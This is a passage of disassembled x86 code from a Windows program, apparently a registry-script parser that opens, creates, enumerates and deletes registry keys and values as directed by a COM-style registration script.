loc_402460: ; CODE XREF: sub_402370+BA�j
mov ecx, [ebp+lpSubKey]
xor edi, edi
cmp byte ptr [ecx], 7Dh
jz loc_402D6A
loc_40246E: ; CODE XREF: sub_402370+473�j
mov edx, ds:lpString2
mov eax, [ebp+lpSubKey]
mov ebx, ds:lstrcmpiA
push edx ; lpString2
push eax ; lpString1
call ebx ; lstrcmpiA
mov ecx, ds:off_40D208
mov edx, [ebp+lpSubKey]
mov edi, eax
push ecx ; lpString2
neg edi
sbb edi, edi
push edx ; lpString1
inc edi
mov [ebp+var_1C], edi
call ebx ; lstrcmpiA
test eax, eax
jz short loc_4024A4
test edi, edi
jz loc_4027F0
loc_4024A4: ; CODE XREF: sub_402370+12A�j
mov edi, [ebp+lpSubKey]
mov ecx, esi
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D8E
cmp al, 27h
jnz short loc_40253B
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_402520
loc_4024CD: ; CODE XREF: sub_402370+1AE�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_402520
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_4024E8
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_4024E8: ; CODE XREF: sub_402370+16D�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
mov edx, [ebp+lpSubKey]
lea ecx, [edi+2]
add edx, 1000h
mov [esi], eax
cmp ecx, edx
jnb loc_402D8E
cmp ebx, eax
jnb short loc_402519
mov eax, ebx
loc_40250D: ; CODE XREF: sub_402370+1A7�j
mov cl, [eax]
inc eax
mov [edi], cl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_40250D
loc_402519: ; CODE XREF: sub_402370+199�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_4024CD
loc_402520: ; CODE XREF: sub_402370+15B�j
; sub_402370+166�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D8E
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_40256F
; ---------------------------------------------------------------------------
loc_40253B: ; CODE XREF: sub_402370+14C�j
; sub_402370+1FA�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_40256C
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_402564
mov eax, ebx
loc_402558: ; CODE XREF: sub_402370+1F2�j
mov dl, [eax]
inc eax
mov [edi], dl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_402558
loc_402564: ; CODE XREF: sub_402370+1E4�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_40253B
loc_40256C: ; CODE XREF: sub_402370+1D5�j
mov byte ptr [edi], 0
loc_40256F: ; CODE XREF: sub_402370+1C9�j
mov eax, [ebp+arg_8]
test eax, eax
jz loc_4027F0
mov ebx, [ebp+lpSubKey]
mov [ebp+var_8], 0
mov eax, ebx
mov cl, [ebx]
test cl, cl
jz short loc_4025AA
mov edi, ds:CharNextA
loc_402592: ; CODE XREF: sub_402370+22E�j
cmp cl, 5Ch
jz short loc_4025A2
push eax ; lpsz
call edi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_402592
jmp short loc_4025AA
; ---------------------------------------------------------------------------
loc_4025A2: ; CODE XREF: sub_402370+225�j
test eax, eax
jnz loc_402D95
loc_4025AA: ; CODE XREF: sub_402370+21A�j
; sub_402370+230�j
mov edi, offset off_40F030
loc_4025AF: ; CODE XREF: sub_402370+25A�j
mov ecx, [edi]
push ecx ; lpString2
push ebx ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jz loc_402671
add edi, 4
cmp edi, offset aTypelib ; "TYPELIB"
jl short loc_4025AF
mov eax, [ebp+arg_4]
push 2001Fh ; samDesired
push ebx ; lpSubKey
push eax ; hKey
lea ecx, [ebp+hKey]
mov [ebp+var_8], eax
mov [ebp+hKey], 0
call sub_402E50
test eax, eax
jnz short loc_402662
lea edx, [ebp+ftLastWriteTime]
mov edi, ds:RegEnumKeyExA
push edx ; lpftLastWriteTime
mov edx, [ebp+hKey]
push eax ; lpcchClass
push eax ; lpClass
push eax ; lpReserved
lea eax, [ebp+cchName]
lea ecx, [ebp+SubKey]
push eax ; lpcchName
push ecx ; lpName
push 0 ; dwIndex
push edx ; hKey
mov [ebp+cchName], 100h
call edi ; RegEnumKeyExA
test eax, eax
jnz short loc_40264F
loc_402617: ; CODE XREF: sub_402370+2DD�j
lea eax, [ebp+SubKey]
lea ecx, [ebp+hKey]
push eax ; lpSubKey
call sub_402EA0
test eax, eax
jnz short loc_402662
lea ecx, [ebp+ftLastWriteTime]
lea edx, [ebp+cchName]
push ecx ; lpftLastWriteTime
mov ecx, [ebp+hKey]
push eax ; lpcchClass
push eax ; lpClass
push eax ; lpReserved
lea eax, [ebp+SubKey]
push edx ; lpcchName
push eax ; lpName
push 0 ; dwIndex
push ecx ; hKey
mov [ebp+cchName], 100h
call edi ; RegEnumKeyExA
test eax, eax
jz short loc_402617
loc_40264F: ; CODE XREF: sub_402370+2A5�j
lea ecx, [ebp+hKey]
call sub_402DC0
mov edx, [ebp+var_8]
push ebx ; lpSubKey
push edx ; hKey
call ds:RegDeleteKeyA ; RegDeleteKeyA
loc_402662: ; CODE XREF: sub_402370+27A�j
; sub_402370+2B8�j
lea ecx, [ebp+hKey]
call sub_402DC0
mov [ebp+var_8], 0
loc_402671: ; CODE XREF: sub_402370+24B�j
mov eax, [ebp+var_1C]
test eax, eax
jz loc_4027E8
mov ecx, esi
mov edi, ebx
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D87
cmp al, 27h
jnz short loc_402712
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_4026F7
loc_4026A4: ; CODE XREF: sub_402370+385�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_4026F7
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_4026BF
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_4026BF: ; CODE XREF: sub_402370+344�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
mov edx, [ebp+lpSubKey]
lea ecx, [edi+2]
add edx, 1000h
mov [esi], eax
cmp ecx, edx
jnb loc_402D87
cmp ebx, eax
jnb short loc_4026F0
mov eax, ebx
loc_4026E4: ; CODE XREF: sub_402370+37E�j
mov cl, [eax]
inc eax
mov [edi], cl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_4026E4
loc_4026F0: ; CODE XREF: sub_402370+370�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_4026A4
loc_4026F7: ; CODE XREF: sub_402370+332�j
; sub_402370+33D�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D87
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_402746
; ---------------------------------------------------------------------------
loc_402712: ; CODE XREF: sub_402370+323�j
; sub_402370+3D1�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_402743
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_40273B
mov eax, ebx
loc_40272F: ; CODE XREF: sub_402370+3C9�j
mov dl, [eax]
inc eax
mov [edi], dl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_40272F
loc_40273B: ; CODE XREF: sub_402370+3BB�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_402712
loc_402743: ; CODE XREF: sub_402370+3AC�j
mov byte ptr [edi], 0
loc_402746: ; CODE XREF: sub_402370+3A0�j
mov ebx, [ebp+lpSubKey]
cmp byte ptr [ebx], 3Dh
jnz short loc_40278B
push ebx
mov ecx, esi
call sub_402020
test eax, eax
jl loc_402D60
mov ecx, esi
call sub_401FD0
lea ecx, [ebp+var_122C]
push ecx
mov ecx, esi
call sub_402020
test eax, eax
jl loc_402D60
push ebx
mov ecx, esi
call sub_402020
test eax, eax
jl loc_402D60
loc_40278B: ; CODE XREF: sub_402370+3DC�j
xor edi, edi
lea ecx, [ebp+var_8]
loc_402790: ; CODE XREF: sub_402370+750�j
call sub_402DC0
loc_402795: ; CODE XREF: sub_402370+850�j
; sub_402370+871�j
mov ebx, [ebp+lpSubKey]
cmp byte ptr [ebx], 7Bh
jnz short loc_4027D7
push ebx ; lpString
call ds:lstrlenA ; lstrlenA
cmp eax, 1
jnz short loc_4027D7
mov edx, [ebp+arg_8]
mov eax, [ebp+cchValueName]
push 0 ; int
push edx ; int
push eax ; int
push ebx ; lpSubKey
mov ecx, esi
call sub_402370
mov edi, eax
test edi, edi
jl loc_402D6A
push ebx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl loc_402D6A
loc_4027D7: ; CODE XREF: sub_402370+42B�j
; sub_402370+437�j ...
mov ecx, [ebp+lpSubKey]
cmp byte ptr [ecx], 7Dh
jz loc_402D6A
jmp loc_40246E
; ---------------------------------------------------------------------------
loc_4027E8: ; CODE XREF: sub_402370+306�j
lea ecx, [ebp+var_8]
call sub_402DC0
loc_4027F0: ; CODE XREF: sub_402370+12E�j
; sub_402370+204�j
mov edx, ds:off_40D20C
mov eax, [ebp+lpSubKey]
push edx ; lpString2
push eax ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz loc_4028D7
mov edi, [ebp+lpSubKey]
mov ecx, esi
mov [ebp+var_18], eax
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D8E
cmp al, 27h
jnz short loc_4028A3
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_402888
loc_402835: ; CODE XREF: sub_402370+516�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_402888
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_402850
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_402850: ; CODE XREF: sub_402370+4D5�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
mov edx, [ebp+lpSubKey]
lea ecx, [edi+2]
add edx, 1000h
mov [esi], eax
cmp ecx, edx
jnb loc_402D8E
cmp ebx, eax
jnb short loc_402881
mov eax, ebx
loc_402875: ; CODE XREF: sub_402370+50F�j
mov cl, [eax]
inc eax
mov [edi], cl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_402875
loc_402881: ; CODE XREF: sub_402370+501�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_402835
loc_402888: ; CODE XREF: sub_402370+4C3�j
; sub_402370+4CE�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D8E
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_4028D7
; ---------------------------------------------------------------------------
loc_4028A3: ; CODE XREF: sub_402370+4B4�j
; sub_402370+562�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_4028D4
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_4028CC
mov eax, ebx
loc_4028C0: ; CODE XREF: sub_402370+55A�j
mov dl, [eax]
inc eax
mov [edi], dl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_4028C0
loc_4028CC: ; CODE XREF: sub_402370+54C�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_4028A3
loc_4028D4: ; CODE XREF: sub_402370+53D�j
mov byte ptr [edi], 0
loc_4028D7: ; CODE XREF: sub_402370+493�j
; sub_402370+531�j
mov ecx, ds:off_40D204
mov ebx, [ebp+lpSubKey]
push ecx ; lpString2
push ebx ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz loc_402B32
mov ecx, esi
lea edi, [ebp+ValueName]
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D8E
cmp al, 27h
jnz short loc_402985
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_40296C
loc_40291C: ; CODE XREF: sub_402370+5FA�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_40296C
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_402937
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_402937: ; CODE XREF: sub_402370+5BC�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
lea edx, [edi+2]
lea ecx, [ebp+arg_ECC]
cmp edx, ecx
mov [esi], eax
jnb loc_402D8E
cmp ebx, eax
jnb short loc_402963
mov ecx, ebx
loc_402959: ; CODE XREF: sub_402370+5F1�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_402959
loc_402963: ; CODE XREF: sub_402370+5E5�j
mov cl, [eax]
mov ebx, [ebp+lpSubKey]
test cl, cl
jnz short loc_40291C
loc_40296C: ; CODE XREF: sub_402370+5AA�j
; sub_402370+5B5�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D8E
push eax ; lpsz
mov byte ptr [edi], 0
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_4029B8
; ---------------------------------------------------------------------------
loc_402985: ; CODE XREF: sub_402370+59B�j
; sub_402370+643�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_4029B5
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_4029AC
mov ecx, ebx
loc_4029A2: ; CODE XREF: sub_402370+63A�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_4029A2
loc_4029AC: ; CODE XREF: sub_402370+62E�j
mov al, [eax]
mov ebx, [ebp+lpSubKey]
test al, al
jnz short loc_402985
loc_4029B5: ; CODE XREF: sub_402370+61F�j
mov byte ptr [edi], 0
loc_4029B8: ; CODE XREF: sub_402370+613�j
mov ecx, esi
mov edi, ebx
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D8E
cmp al, 27h
jnz short loc_402A4E
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_402A33
loc_4029E0: ; CODE XREF: sub_402370+6C1�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_402A33
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_4029FB
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_4029FB: ; CODE XREF: sub_402370+680�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
mov edx, [ebp+lpSubKey]
lea ecx, [edi+2]
add edx, 1000h
mov [esi], eax
cmp ecx, edx
jnb loc_402D8E
cmp ebx, eax
jnb short loc_402A2C
mov eax, ebx
loc_402A20: ; CODE XREF: sub_402370+6BA�j
mov cl, [eax]
inc eax
mov [edi], cl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_402A20
loc_402A2C: ; CODE XREF: sub_402370+6AC�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_4029E0
loc_402A33: ; CODE XREF: sub_402370+66E�j
; sub_402370+679�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D8E
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_402A82
; ---------------------------------------------------------------------------
loc_402A4E: ; CODE XREF: sub_402370+65F�j
; sub_402370+70D�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_402A7F
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_402A77
mov eax, ebx
loc_402A6B: ; CODE XREF: sub_402370+705�j
mov dl, [eax]
inc eax
mov [edi], dl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_402A6B
loc_402A77: ; CODE XREF: sub_402370+6F7�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_402A4E
loc_402A7F: ; CODE XREF: sub_402370+6E8�j
mov byte ptr [edi], 0
loc_402A82: ; CODE XREF: sub_402370+6DC�j
mov edi, [ebp+lpSubKey]
cmp byte ptr [edi], 3Dh
jnz loc_402D9D
mov eax, [ebp+arg_8]
xor ebx, ebx
cmp eax, ebx
jz short loc_402AC5
mov ecx, [ebp+arg_4]
lea edx, [ebp+ValueName]
push edi ; int
lea eax, [ebp+var_8]
mov [ebp+var_8], ecx
push edx ; lpValueName
push eax ; int
mov ecx, esi
call sub_402FF0
mov edi, eax
mov [ebp+var_8], ebx
cmp edi, ebx
lea ecx, [ebp+var_8]
jl loc_402D65
jmp loc_402790
; ---------------------------------------------------------------------------
loc_402AC5: ; CODE XREF: sub_402370+725�j
cmp [ebp+arg_C], ebx
jnz short loc_402AE9
mov eax, [ebp+arg_4]
lea ecx, [ebp+ValueName]
push ecx ; lpValueName
push eax ; hKey
mov [ebp+var_8], eax
call ds:RegDeleteValueA ; RegDeleteValueA
lea ecx, [ebp+var_8]
mov [ebp+var_8], ebx
call sub_402DC0
loc_402AE9: ; CODE XREF: sub_402370+758�j
cmp byte ptr [edi], 3Dh
jnz short loc_402B2B
push edi
mov ecx, esi
call sub_402020
cmp eax, ebx
jl loc_402D83
mov ecx, esi
call sub_401FD0
lea edx, [ebp+var_222C]
mov ecx, esi
push edx
call sub_402020
cmp eax, ebx
jl loc_402D83
push edi
mov ecx, esi
call sub_402020
cmp eax, ebx
jl loc_402D83
loc_402B2B: ; CODE XREF: sub_402370+77C�j
xor edi, edi
jmp loc_4027D7
; ---------------------------------------------------------------------------
loc_402B32: ; CODE XREF: sub_402370+57A�j
mov cl, [ebx]
mov eax, ebx
test cl, cl
jz short loc_402B58
mov edi, ds:CharNextA
loc_402B40: ; CODE XREF: sub_402370+7DC�j
cmp cl, 5Ch
jz short loc_402B50
push eax ; lpsz
call edi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_402B40
jmp short loc_402B58
; ---------------------------------------------------------------------------
loc_402B50: ; CODE XREF: sub_402370+7D3�j
test eax, eax
jnz loc_402D9D
loc_402B58: ; CODE XREF: sub_402370+7C8�j
; sub_402370+7DE�j
mov eax, [ebp+arg_8]
test eax, eax
jz loc_402BE6
mov edi, [ebp+arg_4]
push 0F003Fh ; samDesired
push ebx ; lpSubKey
push edi ; hKey
lea ecx, [ebp+cchValueName]
call sub_402E50
test eax, eax
jz short loc_402BAB
push 20019h ; samDesired
push ebx ; lpSubKey
push edi ; hKey
lea ecx, [ebp+cchValueName]
call sub_402E50
test eax, eax
jz short loc_402BAB
push 0 ; int
push 0 ; dwDisposition
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push ebx ; lpSubKey
push edi ; hKey
lea ecx, [ebp+cchValueName]
call sub_402DE0
test eax, eax
jnz loc_402D9D
loc_402BAB: ; CODE XREF: sub_402370+807�j
; sub_402370+81A�j
push ebx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl loc_402D6A
cmp byte ptr [ebx], 3Dh
jnz loc_402795
mov eax, [ebp+lpSubKey]
lea ecx, [ebp+cchValueName]
push eax ; int
push 0 ; lpValueName
push ecx ; int
mov ecx, esi
call sub_402FF0
mov edi, eax
test edi, edi
jl loc_402D6A
jmp loc_402795
; ---------------------------------------------------------------------------
loc_402BE6: ; CODE XREF: sub_402370+7ED�j
mov edi, [ebp+arg_C]
test edi, edi
jnz short loc_402C0B
mov edx, [ebp+arg_4]
push 20019h ; samDesired
push ebx ; lpSubKey
push edx ; hKey
lea ecx, [ebp+cchValueName]
call sub_402E50
test eax, eax
jz short loc_402C0B
mov edi, 1
mov [ebp+arg_C], edi
loc_402C0B: ; CODE XREF: sub_402370+87B�j
; sub_402370+891�j
mov eax, [ebp+lpString1]
test eax, eax
jnz short loc_402C21
mov eax, 104h
call sub_40AF70
mov eax, esp
mov [ebp+lpString1], eax
loc_402C21: ; CODE XREF: sub_402370+8A0�j
push 104h ; iMaxLength
push ebx ; lpString2
push eax ; lpString1
call ds:lstrcpynA ; lstrcpynA
test edi, edi
jnz short loc_402C54
mov eax, [ebp+cchValueName]
mov ecx, esi
push eax ; hKey
call sub_403400
test eax, eax
jnz short loc_402C54
mov ecx, [ebp+cchValueName]
push ecx ; cchValueName
mov ecx, esi
call sub_403450
test eax, eax
jz loc_402D08
loc_402C54: ; CODE XREF: sub_402370+8C0�j
; sub_402370+8CF�j
push ebx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl loc_402D6A
push ebx
mov ecx, esi
call sub_403500
mov edi, eax
test edi, edi
jl loc_402D6A
cmp byte ptr [ebx], 7Bh
jnz short loc_402CAB
mov edx, [ebp+arg_C]
mov eax, [ebp+cchValueName]
push edx ; int
push 0 ; int
push eax ; int
push ebx ; lpSubKey
mov ecx, esi
call sub_402370
mov edi, eax
test edi, edi
jl loc_402D6A
mov eax, [ebp+arg_C]
test eax, eax
jz short loc_402CB9
mov ecx, [ebp+var_20]
mov [ebp+arg_C], ecx
jmp loc_402D3F
; ---------------------------------------------------------------------------
loc_402CAB: ; CODE XREF: sub_402370+90B�j
mov eax, [ebp+arg_C]
test eax, eax
jnz loc_4027D7
mov ebx, [ebp+lpSubKey]
loc_402CB9: ; CODE XREF: sub_402370+92E�j
mov edx, [ebp+cchValueName]
mov ecx, esi
push edx ; hKey
call sub_403400
test eax, eax
jz short loc_402D08
mov edi, offset off_40F030
loc_402CCD: ; CODE XREF: sub_402370+977�j
mov eax, [edi]
mov ecx, [ebp+lpString1]
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jz short loc_402CF5
add edi, 4
cmp edi, offset aTypelib ; "TYPELIB"
jl short loc_402CCD
mov edx, [ebp+lpString1]
lea ecx, [ebp+cchValueName]
push edx ; lpSubKey
call sub_402EA0
loc_402CF5: ; CODE XREF: sub_402370+96C�j
push ebx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl short loc_402D6A
jmp loc_4027D7
; ---------------------------------------------------------------------------
loc_402D08: ; CODE XREF: sub_402370+8DE�j
; sub_402370+956�j
lea ecx, [ebp+cchValueName]
call sub_402DC0
test eax, eax
jnz loc_402D9D
mov eax, [ebp+var_18]
test eax, eax
jz short loc_402D3F
mov ecx, [ebp+lpString1]
mov eax, [ebp+arg_4]
push ecx ; lpSubKey
push eax ; hKey
mov [ebp+var_8], eax
call ds:RegDeleteKeyA ; RegDeleteKeyA
lea ecx, [ebp+var_8]
mov [ebp+var_8], 0
call sub_402DC0
loc_402D3F: ; CODE XREF: sub_402370+936�j
; sub_402370+9AD�j
push ebx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl short loc_402D6A
push ebx
mov ecx, esi
call sub_403500
mov edi, eax
test edi, edi
jl short loc_402D6A
jmp loc_4027D7
; ---------------------------------------------------------------------------
loc_402D60: ; CODE XREF: sub_402370+3E8�j
; sub_402370+405�j ...
mov edi, eax
loc_402D62: ; CODE XREF: sub_402370+A1C�j
lea ecx, [ebp+var_8]
loc_402D65: ; CODE XREF: sub_402370+74A�j
call sub_402DC0
loc_402D6A: ; CODE XREF: sub_402370+F8�j
; sub_402370+44F�j ...
lea ecx, [ebp+cchValueName]
call sub_402DC0
mov eax, edi
lea esp, [ebp-2238h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_402D83: ; CODE XREF: sub_402370+788�j
; sub_402370+7A5�j ...
mov edi, eax
jmp short loc_402D6A
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402370+31B�j
; sub_402370+368�j ...
mov edi, 80020009h
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D8E: ; CODE XREF: sub_402370+144�j
; sub_402370+191�j ...
mov edi, 80020009h
jmp short loc_402D6A
; ---------------------------------------------------------------------------
loc_402D95: ; CODE XREF: sub_402370+234�j
lea ecx, [ebp+var_8]
call sub_402DC0
loc_402D9D: ; CODE XREF: sub_402370+35�j
; sub_402370+82�j ...
lea ecx, [ebp+cchValueName]
call sub_402DC0
lea esp, [ebp-2238h]
mov eax, 80020009h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_402370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402DC0 proc near ; CODE XREF: sub_402370+2E2�p
; sub_402370+2F5�p ...
push esi
mov esi, ecx
xor eax, eax
mov ecx, [esi]
test ecx, ecx
jz short loc_402DD8
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
mov dword ptr [esi], 0
loc_402DD8: ; CODE XREF: sub_402DC0+9�j
pop esi
retn
sub_402DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_402DE0(HKEY hKey,LPCSTR lpSubKey,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES dwDisposition,int)
sub_402DE0 proc near ; CODE XREF: sub_402370+82E�p
phkResult = dword ptr -4
hKey = dword ptr 4
lpSubKey = dword ptr 8
lpClass = dword ptr 0Ch
dwOptions = dword ptr 10h
samDesired = dword ptr 14h
dwDisposition = dword ptr 18h
arg_18 = dword ptr 1Ch
push ecx
mov edx, [esp+4+dwDisposition]
push esi
mov esi, ecx
lea eax, [esp+8+dwDisposition]
lea ecx, [esp+8+phkResult]
push eax ; lpdwDisposition
mov eax, [esp+0Ch+samDesired]
push ecx ; phkResult
mov ecx, [esp+10h+dwOptions]
push edx ; lpSecurityAttributes
mov edx, [esp+14h+lpClass]
push eax ; samDesired
mov eax, [esp+18h+lpSubKey]
push ecx ; dwOptions
mov ecx, [esp+1Ch+hKey]
push edx ; lpClass
push 0 ; Reserved
push eax ; lpSubKey
push ecx ; hKey
mov [esp+2Ch+phkResult], 0
call ds:RegCreateKeyExA ; RegCreateKeyExA
mov ecx, [esp+8+arg_18]
test ecx, ecx
jz short loc_402E2A
mov edx, [esp+8+dwDisposition]
mov [ecx], edx
loc_402E2A: ; CODE XREF: sub_402DE0+42�j
test eax, eax
jnz short loc_402E47
mov ecx, [esi]
test ecx, ecx
jz short loc_402E41
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
mov dword ptr [esi], 0
loc_402E41: ; CODE XREF: sub_402DE0+52�j
mov ecx, [esp+8+phkResult]
mov [esi], ecx
loc_402E47: ; CODE XREF: sub_402DE0+4C�j
pop esi
pop ecx
retn 1Ch
sub_402DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_402E50(HKEY hKey,LPCSTR lpSubKey,REGSAM samDesired)
sub_402E50 proc near ; CODE XREF: sub_402370+273�p
; sub_402370+800�p ...
phkResult = dword ptr -4
hKey = dword ptr 4
lpSubKey = dword ptr 8
samDesired = dword ptr 0Ch
push ecx
mov edx, [esp+4+lpSubKey]
push esi
mov esi, ecx
lea eax, [esp+8+phkResult]
mov ecx, [esp+8+samDesired]
push eax ; phkResult
mov eax, [esp+0Ch+hKey]
push ecx ; samDesired
push 0 ; ulOptions
push edx ; lpSubKey
push eax ; hKey
mov [esp+1Ch+phkResult], 0
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_402E95
mov ecx, [esi]
test ecx, ecx
jz short loc_402E8F
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
mov dword ptr [esi], 0
loc_402E8F: ; CODE XREF: sub_402E50+30�j
mov ecx, [esp+8+phkResult]
mov [esi], ecx
loc_402E95: ; CODE XREF: sub_402E50+2A�j
pop esi
pop ecx
retn 0Ch
sub_402E50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_402EA0(LPCSTR lpSubKey)
sub_402EA0 proc near ; CODE XREF: sub_402370+2B1�p
; sub_402370+980�p ...
hKey = dword ptr -118h
cchName = dword ptr -114h
phkResult = dword ptr -110h
var_10C = dword ptr -10Ch
ftLastWriteTime = _FILETIME ptr -108h
SubKey = byte ptr -100h
lpSubKey = dword ptr 4
sub esp, 118h
mov edx, [esp+118h+lpSubKey]
push esi
push edi
mov edi, ecx
lea ecx, [esp+120h+phkResult]
mov [esp+120h+var_10C], edi
mov eax, [edi]
push ecx ; phkResult
push 2001Fh ; samDesired
push 0 ; ulOptions
push edx ; lpSubKey
push eax ; hKey
mov [esp+134h+hKey], 0
mov [esp+134h+phkResult], 0
call ds:RegOpenKeyExA ; RegOpenKeyExA
mov esi, eax
test esi, esi
jnz short loc_402F00
mov ecx, [esp+120h+hKey]
test ecx, ecx
jz short loc_402EF0
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_402EF0: ; CODE XREF: sub_402EA0+47�j
mov ecx, [esp+120h+phkResult]
mov esi, eax
test eax, eax
mov [esp+120h+hKey], ecx
jz short loc_402F20
jmp short loc_402F04
; ---------------------------------------------------------------------------
loc_402F00: ; CODE XREF: sub_402EA0+3F�j
mov ecx, [esp+120h+hKey]
loc_402F04: ; CODE XREF: sub_402EA0+5E�j
test ecx, ecx
